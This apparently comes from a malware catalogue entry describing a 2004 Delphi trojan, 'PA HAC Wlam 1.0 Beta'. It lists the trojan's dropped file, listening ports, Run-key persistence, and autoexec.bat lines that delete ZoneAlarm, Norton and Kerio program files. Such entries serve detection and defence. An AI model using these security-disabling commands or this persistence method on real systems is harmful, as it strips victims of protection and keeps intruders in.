PA HAC Wlam 1.0 Beta

PA HAC Wlam 1.0 Beta
(Not detected by AVP on August 17, 2004)

by PA HAC

Written in Delphi

Released in July 2004

Made in Poland

more versions

server


Server:
dropped file:
c:\WINDOWS\config.exe

size: 556.032 bytes 

port: 1789, 1790, 1711, 1710, 1793, 1794, 1795, 1797, 1798, 1721, 1740, 1796 TCP TCP

startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "PowerProfile"
data: C:\windows\config.exe 

lines added to autoexec.bat:
C:\autoexec.bat "del C:\progra~1\zonela~1\zoneal~1\*.*exe"
C:\autoexec.bat "del C:\progra~1\norton~1\*.*dll"
C:\autoexec.bat "del C:\progra~1\kerio\Person~1\*.*exe"
C:\autoexec.bat "del C:\progra~1\norton~1\*.*exe"
C:\autoexec.bat "del C:\progra~1\zonela~1\zoneal~1\*.*dll"
C:\autoexec.bat "dir c:"

MegaSecurity